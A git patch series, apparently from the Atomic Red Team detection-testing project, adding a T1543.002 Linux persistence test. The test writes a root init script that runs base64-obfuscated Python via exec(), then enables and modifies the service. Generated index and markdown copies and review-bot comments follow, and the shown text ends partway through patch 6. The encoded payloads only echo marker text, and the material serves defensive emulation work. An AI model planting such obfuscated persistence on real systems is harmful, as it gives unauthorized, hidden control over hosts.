From 6a9c9ac26f2a297fb6fbcb9f01d50b4d9926111a Mon Sep 17 00:00:00 2001
From: madhavbhatt
Date: Fri, 4 Jun 2021 13:58:10 -0700
Subject: [PATCH 01/84] T1543.002 : Service Creation and Modification for Ubuntu, CentOS OR Kali
---
 atomics/T1543.002/T1543.002.yaml | 45 ++++++++++++++++++++++++++++++++
 1 file changed, 45 insertions(+)
diff --git a/atomics/T1543.002/T1543.002.yaml b/atomics/T1543.002/T1543.002.yaml
index 8b0a1de2..b726bd85 100644
--- a/atomics/T1543.002/T1543.002.yaml
+++ b/atomics/T1543.002/T1543.002.yaml
@@ -66,3 +66,48 @@ atomic_tests:
 systemctl daemon-reload
 name: bash

+
+- name: Create Systemd Service unit file, Enable the service , Modify and Reload the service.
+ description: |
+ This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process.
+
+ supported_platforms:
+ - linux
+ dependencies:
+ - description: |
+ System must be Ubuntu ,Kali OR CentOS.
+ prereq_command: |
+ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi;
+ get_prereq_command: |
+ echo Please run from Ubuntu ,Kali OR CentOS.
+ executor:
+ name: bash
+ elevation_required: true # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false.
+ command: | # These are the actaul attack commands, at least one command must be provided.
+ cat > /etc/init.d/T1543.002 << EOF
+ #!/bin/bash
+ ### BEGIN INIT INFO
+ # Provides : Atomic Test T1543.002
+ # Required-Start: $all
+ # Required-Stop :
+ # Default-Start: 2 3 4 5
+ # Default-Stop:
+ # Short Description: Atomic Test for Systemd Service Creation
+ ### END INIT INFO
+ python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))"
+ EOF
+
+ chmod +x /etc/init.d/T1543.002
+ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ;
+ systemctl enable T1543.002
+ systemctl start T1543.002
+
+ echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
+ systemctl daemon-reload
+ systemctl restart T1543.002
+ cleanup_command: | # You can remove the cleanup_command section if there are no cleanup commands.
+ systemctl stop T1543.002
+ systemctl disable T1543.002
+ rm -rf /etc/init.d/T1543.002
+ systemctl daemon-reload
+
From 1a66af9e941ee7a42bb859741375309128ae71ff Mon Sep 17 00:00:00 2001
From: madhavbhatt
Date: Fri, 4 Jun 2021 14:22:11 -0700
Subject: [PATCH 02/84] T1543.002 : Service Creation and Modification for Ubuntu, CentOS OR Kali
---
 atomics/T1543.002/T1543.002.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/atomics/T1543.002/T1543.002.yaml b/atomics/T1543.002/T1543.002.yaml
index b726bd85..a7adda26 100644
--- a/atomics/T1543.002/T1543.002.yaml
+++ b/atomics/T1543.002/T1543.002.yaml
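Review bot: The new dependency's prereq_command ends with `then exit /b 0; else exit /b 1; fi;`, which is cmd.exe syntax; under the bash executor `exit` takes a single numeric argument, so both branches fail with "too many arguments" and return non-zero without exiting, and the prerequisite check reports unmet on every supported distribution. Replace it with `then exit 0; else exit 1; fi;`. The same line is carried unchanged through the PATCH 02 hunk and into the generated index and markdown in PATCH 06, so it only needs fixing in the source yaml before the docs are regenerated. Separately, the name and description call this a systemd unit file while the command writes a SysV init script under /etc/init.d and relies on systemd's sysv compatibility for `systemctl enable`; the description should say so, because a detection keyed on writes under the systemd unit directories will not see this test.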
@@ -67,7 +67,7 @@ atomic_tests:
 name: bash


-- name: Create Systemd Service unit file, Enable the service , Modify and Reload the service.
+- name: Create Systemd Service file, Enable the service , Modify and Reload the service.
 description: |
 This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process.

@@ -82,8 +82,8 @@ atomic_tests:
 echo Please run from Ubuntu ,Kali OR CentOS.
 executor:
 name: bash
- elevation_required: true # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false.
- command: | # These are the actaul attack commands, at least one command must be provided.
+ elevation_required: true
+ command: |
 cat > /etc/init.d/T1543.002 << EOF
 #!/bin/bash
 ### BEGIN INIT INFO
@@ -105,7 +105,7 @@ atomic_tests:
 echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
 systemctl daemon-reload
 systemctl restart T1543.002
- cleanup_command: | # You can remove the cleanup_command section if there are no cleanup commands.
+ cleanup_command: |
 systemctl stop T1543.002
 systemctl disable T1543.002
 rm -rf /etc/init.d/T1543.002
From 71a7a77e62d1067726aeceb116d0d9f2fc090483 Mon Sep 17 00:00:00 2001
From: patel-bhavin
Date: Fri, 4 Jun 2021 14:30:15 -0700
Subject: [PATCH 03/84] adding kubectl to spec
---
 atomic_red_team/atomic_red_team.rb | 4 ++--
 atomic_red_team/spec.yaml | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/atomic_red_team/atomic_red_team.rb b/atomic_red_team/atomic_red_team.rb
index 24a4c811..f7b63964 100755
--- a/atomic_red_team/atomic_red_team.rb
+++ b/atomic_red_team/atomic_red_team.rb
@@ -142,7 +142,7 @@ class AtomicRedTeam
 raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
 raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/

- valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud']
+ valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
 case executor['name']
 when 'manual'
 raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -152,7 +152,7 @@ class AtomicRedTeam
 string: executor['steps'],
 string_description: "atomic_tests[#{i}].executor.steps"

- when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud'
+ when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
 raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
 raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)

diff --git a/atomic_red_team/spec.yaml b/atomic_red_team/spec.yaml
index 9ccd2b42..7f34d392 100644
--- a/atomic_red_team/spec.yaml
+++ b/atomic_red_team/spec.yaml
@@ -115,7 +115,7 @@ atomic_tests:
 # a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
 # per test, but there are cases where you may have multiple - for example, separate executors for `sh`
 # and `bash` when working on linux OSes.
- # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, and `gcloud`.
+ # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, `gcloud` and `kubectl`.
 executors:
 # the name of the executor describes the framework or application in which the test should be executed.
 #
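Review bot: The `when` list in the second hunk is a second, hand-maintained copy of `valid_executor_types` without 'manual', and this commit had to add 'kubectl' to both; the next executor added to only one of them will pass or fail validation depending on which list it reached. Splatting the array keeps a single source of truth: `when *(valid_executor_types - ['manual'])`. Presumably `valid_executor_types` is also checked with an `include?` between the two hunks, but that code is outside what is shown here, and the enclosing method starts and ends outside both hunks.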
From 6214334306f61550deb56f747ffeb3947d7a0b9e Mon Sep 17 00:00:00 2001 From: madhavbhatt Date: Fri, 4 Jun 2021 14:30:48 -0700 Subject: [PATCH 04/84] Rolling back changes in md file to meet master branch --- atomics/T1543.002/T1543.002.md | 64 ---------------------------------- 1 file changed, 64 deletions(-) diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index 6f2f4e4b..9ea9b5f2 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -16,8 +16,6 @@ While adversaries typically require root privileges to create/modify service uni - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service) -- [Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-unit-file--enable-the-service--modify-and-reload-the-service) -
@@ -77,67 +75,5 @@ systemctl daemon-reload -

-## Atomic Test #2 - Create Systemd Service unit file, Enable the service , Modify and Reload the service. -This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. - -**Supported Platforms:** Linux - - - - - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - - -```bash -cat > /etc/init.d/T1543.002 << EOF -#!/bin/bash -### BEGIN INIT INFO -# Provides : Atomic Test T1543.002 -# Required-Start: $all -# Required-Stop : -# Default-Start: 2 3 4 5 -# Default-Stop: -# Short Description: Atomic Test for Systemd Service Creation -### END INIT INFO -python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" -EOF - -chmod +x /etc/init.d/T1543.002 -if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; -systemctl enable T1543.002 -systemctl start T1543.002 - -echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 -systemctl daemon-reload -systemctl restart T1543.002 -``` - -#### Cleanup Commands: -```bash -systemctl stop T1543.002 -systemctl disable T1543.002 -rm -rf /etc/init.d/T1543.002 -systemctl daemon-reload -``` - - - -#### Dependencies: Run with `bash`! -##### Description: System must be Ubuntu ,Kali OR CentOS. 
-##### Check Prereq Commands: -```bash -if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; -``` -##### Get Prereq Commands: -```bash -echo Please run these atomic tests from Ubuntu ,Kali OR CentOS. -``` - - - - -
From 22d753d55ba0e0a675ccab01422859c104fda390 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 7 Jun 2021 15:44:12 +0000 Subject: [PATCH 05/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1543.002/T1543.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1543.002/T1543.002.yaml b/atomics/T1543.002/T1543.002.yaml index a7adda26..393c59b4 100644 --- a/atomics/T1543.002/T1543.002.yaml +++ b/atomics/T1543.002/T1543.002.yaml @@ -68,6 +68,7 @@ atomic_tests: - name: Create Systemd Service file, Enable the service , Modify and Reload the service. + auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 description: | This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e9c19f64..71c27abf 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -709,3 +709,4 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319 c33f3d80-5f04-419b-a13a-854d1cbdbf3a 126f71af-e1c9-405c-94ef-26a47b16c102 da4f751a-020b-40d7-b9ff-d433b7799803 +c35ac4a8-19de-43af-b9f8-755da7e89c89 From 72c90344983e8e21789ef177ae15825a4c852f79 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 7 Jun 2021 15:44:18 +0000 Subject: [PATCH 06/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/linux-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/linux-index.md | 2 + atomics/Indexes/index.yaml | 84 +++++++++++++++++++ atomics/T1543.002/T1543.002.md | 65 ++++++++++++++ 6 files changed, 157 insertions(+) 
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index da09d5a0..ebe5a1aa 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -192,6 +192,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e- privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell 
@@ -565,6 +566,7 @@ persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364 persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index d7c342f8..f06859b0 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -42,6 +42,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e- privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh @@ -164,6 +165,7 @@ persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3 persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash +persistence,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh persistence,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh 
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 6c7e9586..bb1de4c0 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -370,6 +370,7 @@ - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] + - Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - Atomic Test #1: Create Systemd Service and Timer [linux] - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -1013,6 +1014,7 @@ - T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] + - Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - Atomic Test #1: Create Systemd Service and Timer [linux] - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index de2b75a9..2adc7269 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md 
@@ -137,6 +137,7 @@ - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] + - Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - Atomic Test #1: Create Systemd Service and Timer [linux] - [T1546.005 Trap](../../T1546.005/T1546.005.md) @@ -466,6 +467,7 @@ - T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) - Atomic Test #1: Create Systemd Service [linux] + - Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux] - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) - Atomic Test #1: Create Systemd Service and Timer [linux] - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 35161db6..ffb927c7 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -17073,6 +17073,48 @@ privilege-escalation: rm -rf #{systemd_service_path}/#{systemd_service_file} systemctl daemon-reload name: bash + - name: Create Systemd Service file, Enable the service , Modify and Reload the + service. + auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 + description: "This test creates a systemd service unit file and enables it to + autostart on boot. Once service is created and enabled, it also modifies this + same service file showcasing both Creation and Modification of system process. + \n" + supported_platforms: + - linux + dependencies: + - description: 'System must be Ubuntu ,Kali OR CentOS. + +' + prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat + /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i + ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; + +' + get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. + +' + executor: + name: bash + elevation_required: true + command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT + INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop + : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic + Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import + os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod + +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu) + ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 + defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then + chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali + OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho + \"python3 -c \\\"import os, 
base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\" + | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl + restart T1543.002\n" + cleanup_command: | + systemctl stop T1543.002 + systemctl disable T1543.002 + rm -rf /etc/init.d/T1543.002 + systemctl daemon-reload T1053.006: technique: id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 
@@ -44860,6 +44902,48 @@ persistence: rm -rf #{systemd_service_path}/#{systemd_service_file} systemctl daemon-reload name: bash + - name: Create Systemd Service file, Enable the service , Modify and Reload the + service. + auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 + description: "This test creates a systemd service unit file and enables it to + autostart on boot. Once service is created and enabled, it also modifies this + same service file showcasing both Creation and Modification of system process. + \n" + supported_platforms: + - linux + dependencies: + - description: 'System must be Ubuntu ,Kali OR CentOS. + +' + prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat + /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i + ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi; + +' + get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS. + +' + executor: + name: bash + elevation_required: true + command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT + INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop + : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic + Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import + os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod + +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu) + ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 + defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then + chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali + OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho + \"python3 -c \\\"import os, 
base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\" + | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl + restart T1543.002\n" + cleanup_command: | + systemctl stop T1543.002 + systemctl disable T1543.002 + rm -rf /etc/init.d/T1543.002 + systemctl daemon-reload T1053.006: technique: id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md index c9bfec54..44951c1c 100644 --- a/atomics/T1543.002/T1543.002.md +++ b/atomics/T1543.002/T1543.002.md @@ -16,6 +16,8 @@ While adversaries typically require root privileges to create/modify service uni - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service) +- [Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-file--enable-the-service--modify-and-reload-the-service) +
@@ -75,4 +77,67 @@ systemctl daemon-reload +
+
+ +## Atomic Test #2 - Create Systemd Service file, Enable the service , Modify and Reload the service. +This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +cat > /etc/init.d/T1543.002 << EOF +#!/bin/bash +### BEGIN INIT INFO +# Provides : Atomic Test T1543.002 +# Required-Start: $all +# Required-Stop : +# Default-Start: 2 3 4 5 +# Default-Stop: +# Short Description: Atomic Test for Systemd Service Creation +### END INIT INFO +python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))" +EOF + +chmod +x /etc/init.d/T1543.002 +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ; +systemctl enable T1543.002 +systemctl start T1543.002 + +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 +systemctl daemon-reload +systemctl restart T1543.002 +``` + +#### Cleanup Commands: +```bash +systemctl stop T1543.002 +systemctl disable T1543.002 +rm -rf /etc/init.d/T1543.002 +systemctl daemon-reload +``` + + + +#### Dependencies: Run with `bash`! +##### Description: System must be Ubuntu ,Kali OR CentOS. 
